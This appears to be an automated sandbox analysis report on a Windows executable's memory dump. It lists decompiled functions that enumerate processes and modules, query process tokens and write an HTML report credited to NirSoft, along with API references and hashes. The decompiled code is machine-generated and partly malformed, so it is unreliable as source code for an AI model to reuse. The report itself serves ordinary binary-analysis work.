                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				char _v52;
                                                                                                                				char _v60;
                                                                                                                				void _v315;
                                                                                                                				char _v316;
                                                                                                                				void _v826;
                                                                                                                				char _v828;
                                                                                                                				void _v1338;
                                                                                                                				char _v1340;
                                                                                                                				void* __esi;
                                                                                                                				void* _t61;
                                                                                                                				_Unknown_base(*)()* _t93;
                                                                                                                				void* _t94;
                                                                                                                				int _t106;
                                                                                                                				void* _t108;
                                                                                                                				void* _t110;
                                                                                                                
                                                                                                                				_v828 = 0;
                                                                                                                				memset( &_v826, 0, 0x1fe);
                                                                                                                				_v1340 = 0;
                                                                                                                				memset( &_v1338, 0, 0x1fe);
                                                                                                                				_t110 = _t108 + 0x18;
                                                                                                                				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                                                				_t113 = _t61;
                                                                                                                				_v20 = _t61;
                                                                                                                				if(_t61 == 0) {
                                                                                                                					L11:
                                                                                                                					if(_v828 == 0) {
                                                                                                                						__eflags = 0;
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                					_push( &_v828);
                                                                                                                					_push( &_v1340);
                                                                                                                					_push(L"%s\\%s");
                                                                                                                					_push(0xff);
                                                                                                                					_push(_a8);
                                                                                                                					L0040B1EC();
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_v8 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                                                				_t106 = _v24;
                                                                                                                				if(_t106 == 0) {
                                                                                                                					_t32 =  &_v20; // 0x4059ec
                                                                                                                					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                                                					_v316 = 0;
                                                                                                                					memset( &_v315, 0, 0xfe);
                                                                                                                					_t110 = _t110 + 0x20;
                                                                                                                					_v16 = 0xff;
                                                                                                                					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L9:
                                                                                                                						CloseHandle(_v20);
                                                                                                                						if(_v8 != 0) {
                                                                                                                							FreeLibrary(_v8);
                                                                                                                						}
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_push( &_v28);
                                                                                                                					_push( &_a4);
                                                                                                                					_push( &_v1340);
                                                                                                                					_push( &_v12);
                                                                                                                					_push( &_v828);
                                                                                                                					_a4 = 0xff;
                                                                                                                					_push( &_v316);
                                                                                                                					L8:
                                                                                                                					_v12 = 0xff;
                                                                                                                					E0040906D( &_v8, _t117);
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_v316 = 0;
                                                                                                                				memset( &_v315, 0, 0xff);
                                                                                                                				_v12 = _t106;
                                                                                                                				_t110 = _t110 + 0xc;
                                                                                                                				_a4 = 0;
                                                                                                                				if(E00408F72( &_v8) == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                                                				if(_t93 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                                                				_t117 = _t94;
                                                                                                                				if(_t94 == 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_push( &_v28);
                                                                                                                				_push( &_v12);
                                                                                                                				_push( &_v1340);
                                                                                                                				_push( &_v16);
                                                                                                                				_push( &_v828);
                                                                                                                				_push(_v316);
                                                                                                                				_v16 = 0xff;
                                                                                                                				goto L8;
                                                                                                                			}



























                                                                                                                0x00409b6c
                                                                                                                0x00409b6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b77
                                                                                                                0x00409b7b
                                                                                                                0x00409b82
                                                                                                                0x00409b86
                                                                                                                0x00409b8d
                                                                                                                0x00409b8e
                                                                                                                0x00409b94
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409AB7
                                                                                                                • memset.MSVCRT ref: 00409ACF
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • memset.MSVCRT ref: 00409B25
                                                                                                                • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                • memset.MSVCRT ref: 00409BC7
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                • API String ID: 3504373036-27875219
                                                                                                                • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409172() {
                                                                                                                				void* _t1;
                                                                                                                				int _t2;
                                                                                                                				struct HINSTANCE__* _t5;
                                                                                                                
                                                                                                                				if( *0x4101bc != 0) {
                                                                                                                					return _t1;
                                                                                                                				}
                                                                                                                				_t2 = E00405436(L"psapi.dll");
                                                                                                                				_t5 = _t2;
                                                                                                                				if(_t5 == 0) {
                                                                                                                					L10:
                                                                                                                					return _t2;
                                                                                                                				} else {
                                                                                                                					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                                                					 *0x40f848 = _t2;
                                                                                                                					if(_t2 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                                                						 *0x40f840 = _t2;
                                                                                                                						if(_t2 != 0) {
                                                                                                                							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                                                                							 *0x40f838 = _t2;
                                                                                                                							if(_t2 != 0) {
                                                                                                                								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                                                								 *0x40fa6c = _t2;
                                                                                                                								if(_t2 != 0) {
                                                                                                                									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                                                									 *0x40f844 = _t2;
                                                                                                                									if(_t2 != 0) {
                                                                                                                										 *0x4101bc = 1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if( *0x4101bc == 0) {
                                                                                                                						_t2 = FreeLibrary(_t5);
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1182944575-70141382
                                                                                                                • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004090EE() {
                                                                                                                				void* _t1;
                                                                                                                				_Unknown_base(*)()* _t2;
                                                                                                                				struct HINSTANCE__* _t4;
                                                                                                                
                                                                                                                				if( *0x4101b8 != 0) {
                                                                                                                					return _t1;
                                                                                                                				}
                                                                                                                				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                				_t4 = _t2;
                                                                                                                				if(_t4 == 0) {
                                                                                                                					L9:
                                                                                                                					return _t2;
                                                                                                                				}
                                                                                                                				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                                				 *0x40f83c = _t2;
                                                                                                                				if(_t2 != 0) {
                                                                                                                					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                                					 *0x40f834 = _t2;
                                                                                                                					if(_t2 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                                						 *0x40f830 = _t2;
                                                                                                                						if(_t2 != 0) {
                                                                                                                							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                                							 *0x40f5c4 = _t2;
                                                                                                                							if(_t2 != 0) {
                                                                                                                								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                                								 *0x40f828 = _t2;
                                                                                                                								if(_t2 != 0) {
                                                                                                                									 *0x4101b8 = 1;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L9;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				char _v1028;
                                                                                                                				void _v1538;
                                                                                                                				char _v1540;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr* _t50;
                                                                                                                				void* _t61;
                                                                                                                
                                                                                                                				_t50 = __ecx;
                                                                                                                				_push(0x1fe);
                                                                                                                				_push(0);
                                                                                                                				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                					_v1540 = 0;
                                                                                                                					memset( &_v1538, ??, ??);
                                                                                                                					_v1028 = 0;
                                                                                                                					memset( &_v1026, 0, 0x1fe);
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v514, 0, 0x1fe);
                                                                                                                					L0040B1EC();
                                                                                                                					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                                					L0040B1EC();
                                                                                                                					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                                					if (_t39 != 0) goto L3;
                                                                                                                					return _t39;
                                                                                                                				}
                                                                                                                				_v516 = 0;
                                                                                                                				memset( &_v514, ??, ??);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fe);
                                                                                                                				L0040B1EC();
                                                                                                                				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                                				L0040B1EC();
                                                                                                                				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                                				void _v8202;
                                                                                                                				short _v8204;
                                                                                                                				void* _t27;
                                                                                                                				short _t29;
                                                                                                                				short _t40;
                                                                                                                				void* _t41;
                                                                                                                				struct HMENU__* _t43;
                                                                                                                				short _t50;
                                                                                                                				void* _t52;
                                                                                                                				struct HMENU__* _t59;
                                                                                                                
                                                                                                                				E0040B550(0x2008, __ecx);
                                                                                                                				_t65 = _a8 - 4;
                                                                                                                				if(_a8 != 4) {
                                                                                                                					__eflags = _a8 - 5;
                                                                                                                					if(_a8 == 5) {
                                                                                                                						_t50 =  *0x40fe2c; // 0x0
                                                                                                                						__eflags = _t50;
                                                                                                                						if(_t50 == 0) {
                                                                                                                							L8:
                                                                                                                							_push(_a12);
                                                                                                                							_t27 = 5;
                                                                                                                							E00405E8D(_t27);
                                                                                                                							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                                                							__eflags = _t29;
                                                                                                                							_a8 = _t29;
                                                                                                                							if(_t29 == 0) {
                                                                                                                								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                                                							}
                                                                                                                							_v8204 = 0;
                                                                                                                							memset( &_v8202, 0, 0x2000);
                                                                                                                							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                                							__eflags = _v8204;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                                                							}
                                                                                                                							EnumChildWindows(_a8, E0040614F, 0);
                                                                                                                							DestroyWindow(_a8);
                                                                                                                						} else {
                                                                                                                							while(1) {
                                                                                                                								_t40 =  *_t50;
                                                                                                                								__eflags = _t40;
                                                                                                                								if(_t40 == 0) {
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                								__eflags = _t40 - _a12;
                                                                                                                								if(_t40 != _a12) {
                                                                                                                									_t50 = _t50 + 4;
                                                                                                                									__eflags = _t50;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push(_a12);
                                                                                                                					_t41 = 4;
                                                                                                                					E00405E8D(_t41);
                                                                                                                					_pop(_t52);
                                                                                                                					_t43 = LoadMenuW(_a4, _a12);
                                                                                                                					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                                                					_t59 = _t43;
                                                                                                                					_push(1);
                                                                                                                					_push(_t59);
                                                                                                                					_push(_a12);
                                                                                                                					E0040605E(_t52, _t65);
                                                                                                                					DestroyMenu(_t59);
                                                                                                                				}
                                                                                                                				L13:
                                                                                                                				return 1;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32 ref: 00406236
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                  • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                  • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                • memset.MSVCRT ref: 004062DA
                                                                                                                • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                  • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				void _v2050;
                                                                                                                				char _v2052;
                                                                                                                				void _v4098;
                                                                                                                				long _v4100;
                                                                                                                				void _v6146;
                                                                                                                				char _v6148;
                                                                                                                				void* __esi;
                                                                                                                				void* _t43;
                                                                                                                				intOrPtr* _t49;
                                                                                                                				intOrPtr* _t57;
                                                                                                                				void* _t58;
                                                                                                                				void* _t59;
                                                                                                                				intOrPtr _t62;
                                                                                                                				intOrPtr _t63;
                                                                                                                
                                                                                                                				_t49 = __ecx;
                                                                                                                				E0040B550(0x1800, __ecx);
                                                                                                                				_t57 = _t49;
                                                                                                                				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                				_v4100 = 0;
                                                                                                                				memset( &_v4098, 0, 0x7fe);
                                                                                                                				_v2052 = 0;
                                                                                                                				memset( &_v2050, 0, 0x7fe);
                                                                                                                				_v6148 = 0;
                                                                                                                				memset( &_v6146, 0, 0x7fe);
                                                                                                                				_t59 = _t58 + 0x24;
                                                                                                                				_t62 =  *0x40fe30; // 0x0
                                                                                                                				if(_t62 != 0) {
                                                                                                                					_push(0x40fe30);
                                                                                                                					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                                					_push(0x400);
                                                                                                                					_push( &_v2052);
                                                                                                                					L0040B1EC();
                                                                                                                					_t59 = _t59 + 0x10;
                                                                                                                				}
                                                                                                                				_t63 =  *0x40fe28; // 0x0
                                                                                                                				if(_t63 != 0) {
                                                                                                                					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                				}
                                                                                                                				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                                				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                                                				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                				_push(0x400);
                                                                                                                				_push( &_v6148);
                                                                                                                				L0040B1EC();
                                                                                                                				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                                                				_t64 = _a8 - 5;
                                                                                                                				if(_a8 == 5) {
                                                                                                                					return E00407D03(_t57, _t64, _a4);
                                                                                                                				}
                                                                                                                				return _t43;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                                • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                                                				void _v526;
                                                                                                                				long _v528;
                                                                                                                				wchar_t* _t17;
                                                                                                                				signed int _t40;
                                                                                                                				wchar_t* _t50;
                                                                                                                
                                                                                                                				_t50 = __edi;
                                                                                                                				if(__esi[0] != 0x3a) {
                                                                                                                					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                                					if(_t17 == 0) {
                                                                                                                						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                                                						if(_t40 < 0) {
                                                                                                                							if( *__esi != 0x5c) {
                                                                                                                								wcscpy(__edi, __esi);
                                                                                                                							} else {
                                                                                                                								_v528 = 0;
                                                                                                                								memset( &_v526, 0, 0x208);
                                                                                                                								E00404C08( &_v528);
                                                                                                                								memcpy(__edi,  &_v528, 4);
                                                                                                                								__edi[1] = __edi[1] & 0x00000000;
                                                                                                                								wcscat(__edi, __esi);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_v528 = 0;
                                                                                                                							memset( &_v526, 0, 0x208);
                                                                                                                							E00404C08( &_v528);
                                                                                                                							wcscpy(__edi,  &_v528);
                                                                                                                							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                                						}
                                                                                                                						L11:
                                                                                                                						return _t50;
                                                                                                                					}
                                                                                                                					_push( &(_t17[0]));
                                                                                                                					L4:
                                                                                                                					wcscpy(_t50, ??);
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_push(__esi);
                                                                                                                				goto L4;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409223
                                                                                                                • wcscpy.MSVCRT ref: 00409233
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                  • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                • wcscpy.MSVCRT ref: 00409282
                                                                                                                • wcscat.MSVCRT ref: 0040928D
                                                                                                                • memset.MSVCRT ref: 00409269
                                                                                                                  • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                  • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                • memset.MSVCRT ref: 004092B1
                                                                                                                • memcpy.MSVCRT ref: 004092CC
                                                                                                                • wcscat.MSVCRT ref: 004092D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
